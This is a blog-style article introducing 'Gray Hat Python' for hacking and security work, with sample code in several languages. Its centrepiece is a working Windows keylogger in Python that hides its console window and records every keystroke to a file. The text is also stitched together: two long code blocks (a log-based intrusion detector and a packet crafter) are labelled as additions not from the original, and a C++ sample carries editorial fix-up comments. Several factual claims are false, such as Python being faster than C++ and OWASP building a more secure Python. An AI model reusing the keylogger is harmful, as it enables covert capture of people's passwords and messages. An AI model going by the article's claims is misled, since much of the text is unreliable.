Updated June 12, 2023
Introduction to Gray Hat Python
So, two years back, I was researching programming languages; I started reading about C, C++, Assembly, Python, and Ruby. I wanted to become an expert in cyber security, so I started learning as much as I could. I started with C, C++, and C# as the basics, and after writing and compiling lots of programs and viruses, I finally started learning Kali Linux. For those who don't know, Kali Linux is an operating system for penetration testing. As I went on with my studies, I saw that most of the programs, viruses, and Trojans were written in Python, with Ruby as their base.
So, I paused my studies for the time being and started learning Python, or, to be precise, Gray Hat Python, and tadaa… It was extremely easy compared to C, C#, or any other language I knew. I finally understood why Python is the most useful language and how it became famous.
Today, I will discuss how Python transformed into Gray Hat Python and why it is so extensively useful that even Google and YouTube use it in their databases to give the most accurate search results possible.
To start, Python is a high-level programming language, which means its syntax is extremely easy to read, even for beginners. If you are new to programming, this is the language I would suggest you start with. Let me give you an example:
How does it look in Different Programming Languages?
The same Hello World program, written in different programming languages:
This is how it looks in C
    #include <stdio.h>
    int main()
    {
        printf("Hello world\n");
        return 0;
    }
This is how it looks in Java
    class HelloWorld
    {
        public static void main(String args[])
        {
            System.out.println("Hello World");
        }
    }
This is how it looks in Python (v2.7)
    print("Hello World")
Simple? Yes, it is. So, Python was easy to write and understand and very compact. So, you might wonder how this led to Gray Hat Python.
Python vs Gray Hat Python
So, what exactly is Gray Hat Python? Why is it so different from our normal Python? The thing is, Gray Hat Python is nothing but programs written in Python by hackers, network stress testers, and reverse engineers to create or crack a program. It is useful both for securing software and for creating security-breaking software. It is called Gray Hat because it is neither purely beneficial software nor ordinary user software.
It can be used either to test the limits of a secure environment or to break into one. That is what Gray Hat means. And it is far easier to do this in Python than in C, C++, or Java; hence the name Gray Hat Python. A few examples I can think of are:
• Writing key-loggers (for Hackers and Pentesters)
• Writing Security Shell Scripts (For Network Administrators)
• Writing an Automated IDS (Intrusion Detection System for Security Engineers)
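As an added illustration of the third item (this is not code from the original article), here is a minimal automated IDS in Python: it parses sshd-style auth log lines and raises an alert when one source address produces a threshold of failed logins inside a sliding time window. The log lines, hostname, and IP addresses are constructed samples.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample lines in sshd's auth.log style (not real log data).
SAMPLE_LOG = """\
Jun 12 10:00:01 host sshd[101]: Failed password for root from 203.0.113.7 port 5001 ssh2
Jun 12 10:00:03 host sshd[102]: Failed password for invalid user admin from 203.0.113.7 port 5002 ssh2
Jun 12 10:00:05 host sshd[103]: Failed password for root from 203.0.113.7 port 5003 ssh2
Jun 12 10:00:07 host sshd[104]: Failed password for invalid user test from 203.0.113.7 port 5004 ssh2
Jun 12 10:00:09 host sshd[105]: Failed password for root from 203.0.113.7 port 5005 ssh2
Jun 12 10:00:20 host sshd[106]: Accepted password for alice from 198.51.100.4 port 6001 ssh2
Jun 12 10:30:00 host sshd[107]: Failed password for bob from 198.51.100.4 port 6002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \d{2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>[\d.]+)"
)

def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Return (src_ip, first_ts, last_ts, usernames) alerts for every source that
    produces at least `threshold` failed logins inside any `window_s`-second window."""
    attempts = defaultdict(deque)   # src -> deque of (timestamp, user), oldest first
    alerts, alerted = [], set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                 # not a failed-login line; ignore it
        # syslog lines carry no year; 2023 is assumed here purely for parsing
        ts = datetime.strptime("2023 " + m["ts"], "%Y %b %d %H:%M:%S")
        q = attempts[m["src"]]
        q.append((ts, m["user"]))
        while q and (ts - q[0][0]).total_seconds() > window_s:
            q.popleft()              # slide the window forward
        if len(q) >= threshold and m["src"] not in alerted:
            alerted.add(m["src"])    # one alert per source, not one per extra attempt
            users = sorted({u for _, u in q})
            alerts.append((m["src"], q[0][0].isoformat(), ts.isoformat(), users))
    return alerts

if __name__ == "__main__":
    for src, first, last, users in detect_bruteforce(SAMPLE_LOG):
        print(f"ALERT {src}: failed logins {first}..{last}, usernames tried {users}")
```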
So, now you know why and how Gray Hat Python is useful. To elaborate on this, let me give you some detailed examples.
You may have heard of Google App Engine. Google App Engine was originally designed in Python before it was ported on. Google App Engine is a good example of a program written in Python because it allows building web applications using its rich collection of libraries, tools, and frameworks.
Have you ever wondered why searching for something on Google is so easy? Most of the time, you get search results that are 80% accurate. This is because Python is extremely flexible, works at high speed, and its databases are much more compact even though they store any number of records. Python is so extensible that even YouTube uses it for purposes like viewing videos, controlling templates, administering videos, accessing canonical data, and many more.
Google has its crawlers and spiders, which gather data as soon as it is uploaded to the web, no matter where it is or how secure it is. One just needs the proper inspiration, time, and knowledge to gather this information.
Google searches were previously based on Python, which later changed to C++ for speed optimization, because Google's crawlers crawl many pages per second, and each takes a few minutes to crawl successfully. Python, at present, is much faster than C++, but that wasn't the case a few decades ago.
Google has a famous saying:
“Python where we can, C++ where we must.”
So, you might be wondering how this can be useful for hacking, pentesting, and network security. I beg to differ. Suppose you could create a program that is 70%-80% accurate in giving efficient search results. In that case, you could probably build an application that connects websites, searches smartly, and builds a person's profile, which individual Black Hats could use for malicious purposes. Leave individuals aside; someone smart enough could easily create an application for building a company's profile, its whole tree from its root to whatever you can think of…
Information Gathering via Maltego
You may be thinking that I am exaggerating a bit. Nope, I am NOT!
Think of examples like Maltego. Maltego is software, or, to put it better, an open-source forensics application built to gather information and build profiles of people, companies, and other corporate agencies.
One just needs to enter the pertinent data into the app, and the rest, such as linking emails, people, and groups of people, and even mapping internet infrastructure such as domains, DNS names, netblocks, and IP addresses, can be connected and interconnected using this open-source intelligence.
For more information, see What is Maltego?
So, if access to “Secret information” determines your success, then Maltego can help you discover it. Maltego is partially written in Python and uses Java, which is a great language.
So much for security quotes from Google. To be more precise, Google is the least effective way to keep yourself anonymous on the web. It doesn't matter whether you use incognito mode or www.duckduckgo.com from Chrome, because ultimately everything ends up on the web. The point here is that it's not about invulnerability; it's about being vulnerable. One cannot completely wipe oneself off the Internet, but one can keep as little information on the web as possible.
Python is not just a language; it's a scripting language. Scripting languages allow you to write and modify your own tools when you need something more custom. Network security tools depend heavily on scripting languages for extensibility. For example, take Scapy.
Scapy is written purely in Python. It is a powerful interactive packet manipulation tool. It can generate fake packets, scan networks, and even sniff packets.
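To show in plain Python the kind of packet manipulation Scapy abstracts away, here is an added example (it is neither Scapy's code nor code from the original article) that crafts an IPv4/TCP SYN with the standard struct module and then dissects it again, verifying the IPv4 header checksum the way a sniffer should before trusting a captured packet. The addresses, ports, and sequence number are constructed values.

```python
import struct
from ipaddress import IPv4Address

def ipv4_checksum(header: bytes) -> int:
    """RFC 1071 one's-complement checksum over an IPv4 header.
    Over a header whose checksum field is already filled in, the result is 0."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)   # fold carries back in
    return (~total) & 0xFFFF

def build_syn(src, dst, sport, dport, seq=0):
    """Craft a minimal IPv4/TCP SYN by hand (what Scapy's IP()/TCP() layers do for you)."""
    # TCP: ports, seq, ack, data offset (5 words), flags (SYN=0x02), window, checksum, urgent
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x02, 8192, 0, 0)
    # IPv4: version/IHL, TOS, total length, id, flags/frag (DF), TTL, proto 6, checksum, addrs
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x1234, 0x4000, 64, 6, 0,
                     IPv4Address(src).packed, IPv4Address(dst).packed)
    ip = ip[:10] + struct.pack("!H", ipv4_checksum(ip)) + ip[12:]  # fill in the checksum
    return ip + tcp

def dissect(pkt: bytes) -> dict:
    """Decode the IPv4 and TCP headers of a captured packet and check the IP checksum."""
    (ver_ihl, _tos, total_len, _ident, _frag, ttl, proto,
     _csum, s, d) = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or len(pkt) < total_len:
        raise ValueError("malformed IPv4 header")
    info = {"src": str(IPv4Address(s)), "dst": str(IPv4Address(d)), "ttl": ttl,
            "proto": proto, "ip_checksum_ok": ipv4_checksum(pkt[:ihl]) == 0}
    if proto == 6 and len(pkt) >= ihl + 20:
        sport, dport, seq, _ack, _off, flags = struct.unpack("!HHIIBB", pkt[ihl:ihl + 14])
        names = ["FIN", "SYN", "RST", "PSH", "ACK", "URG"]
        info.update(sport=sport, dport=dport, seq=seq,
                    flags=[n for i, n in enumerate(names) if flags & (1 << i)])
    return info

if __name__ == "__main__":
    pkt = build_syn("192.0.2.1", "198.51.100.9", 40000, 443, seq=1)  # constructed packet
    print(dissect(pkt))
```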
For more details, see What is Scapy?
Now, these are complex programs written by advanced programmers. Let's see how simple it is to write a program in Python that people with good programming basics can easily understand.
How is a keylogger written in Python?
Following is a code for a keylogger written in Python:
    #!/usr/bin/python
    import pyHook
    import pythoncom
    import win32gui
    import win32console

    log_file = "log_file.txt"                 # name of log file
    window = win32console.GetConsoleWindow()  # get the script's console window
    win32gui.ShowWindow(window, 0)            # hide the window

    def pressed_chars(event):                 # called on every key-down event
        if event.Ascii:
            f = open(log_file, "a")           # open log_file in append mode
            char = chr(event.Ascii)           # convert the key code to its character
            if char == "q":                   # if char is q
                f.close()                     # close and save log file
                exit()                        # exit program
            if event.Ascii == 13:             # if char is "return"
                f.write("\n")                 # new line
            f.write(char)                     # write char

    proc = pyHook.HookManager()               # create the pyHook hook manager
    proc.KeyDown = pressed_chars              # run pressed_chars on each KeyDown event
    proc.HookKeyboard()                       # install the keyboard hook
    pythoncom.PumpMessages()                  # process Windows messages so the hook fires
So, this is more than easy, if you ask me. I have simply imported the modules pyHook, pythoncom, win32gui, and win32console, which you can download from SourceForge, and I have added comments using the hash sign. But if I have to write the same program in C++, let's see how hard that can be.
This is a program written in C++.
    #include <fstream>
    #include <iostream>
    #include <string>
    #include <vector>

    int main(int argc, char **argv)
    {
        using namespace std; /*Easier*/
        // The staged characters of the original, as valid C++ vectors.
        // The original's empty strings are taken as the spaces in "STOP LOOKING FOR MALWARE".
        vector<vector<char>> parts = {
            {'S', 'T', 'O'},
            {'P', ' '},
            {'L', 'O', 'O', 'K', 'I', 'N', 'G'},
            {' ', 'F', 'O', 'R'},
            {'M', 'A', 'L', 'W'},
            {'A', 'R', 'E'},
        };
        const char *path = "C:\\users\\keylogger.txt"; // backslashes must be escaped

        ofstream os(path);          // a file is written through ofstream, not ostream
        for (const vector<char> &part : parts) {
            for (char c : part) {
                os << c;
                // Busy-wait delay; it uses its own counter so it does not clobber the loop index
                for (volatile long j = 0; j <= 1000000; j++) {
                }
            }
        }
        os.close();

        ifstream is(path);          // read the file back through ifstream
        string line;
        while (getline(is, line)) { // a stream cannot be printed directly; print its lines
            cout << line << '\n';
        }
        return 0;
    }
So, this is pretty large compared to Python. And if we talk about efficiency, then Python can easily be compiled into an executable without any effort using py2exe. Whereas if I talk about C++, then, frankly speaking, this code is a joke. Besides, this code is far from easy for a beginner to understand. To write a proper keylogger, one must write a DLL that implements the WH_KEYBOARD hook.
Open Source Hacking
Now, this takes care of Black Hat hackers, who, to be more precise, are the people who intend to destroy and manipulate data for their own needs. Regarding security concerns, Python is also useful for White Hat hackers, who intend to save society from malicious hackers' attacks. If you want to develop a career, or at least want to learn Python for security research, then you can surely go deep with OWASP, BRO, or Quick NIX Secure Script.
OWASP is the Open Web Application Security Project. OWASP aims to create a more secure version of Python that makes it easier for security professionals and developers to write software less prone to hackers' attacks. It is related to black-box analysis, identifying and addressing security-related issues that can affect Python's interactive interpreter.
BRO is a network security and traffic monitoring program, whereas Quick NIX is useful for hardening and securing file ownership on the fly.
Since we are speaking of security, let's talk about an operating system partially based on Python. Python works great with UNIX, Linux, and Debian. One of the most famous operating systems was Backtrack 5. There were different versions, and it was specifically for pentesting. Later on, the people at Offensive Security decided that Backtrack needed a reboot because most of the tools were either not working properly or were no longer supported.
Later, they released Kali Linux, which was based on Debian, and most of its framework is in either Ruby or Python. Ruby, too, is an awesome scripting language, but I would always prefer Python over it because Python has a more diverse community on Linux, and it is more direct and easier to debug. Ruby, by contrast, has many features and adapts quickly to its surrounding environment, but it can be hard to debug and read, and it is more sophisticated than Python.
The best analogy would be comparing Apple vs Linux, or iPhone vs Android. Apple is rich in resources, extremely smooth, and more biased toward beginners, whereas Linux/Android is more user-friendly, a bit laggy, and can be a headache sometimes if you don't know how to configure or maintain it.
Justin Seitz has even written a book on Gray Hat Python. It deals specifically with automating tedious reverse engineering and security-related tasks, designing your own debugger, library and DLL injection, sniffing secure traffic over an encrypted session, using Immunity Debugger, Sulley, and much more. It's an awesome book; it doesn't matter whether you are a beginner or an expert, you will always learn something new every time you read it.
Conclusion
So, if you are a beginner, Python would be the right choice for you to start with as your first programming security testing language.
Just remember one thing in the end: Gray Hat Python is not just a language; it’s a way to do things properly and quickly.
We hope that this EDUCBA information on “Gray Hat Python” was beneficial to you. You can view EDUCBA’s recommended articles for more information.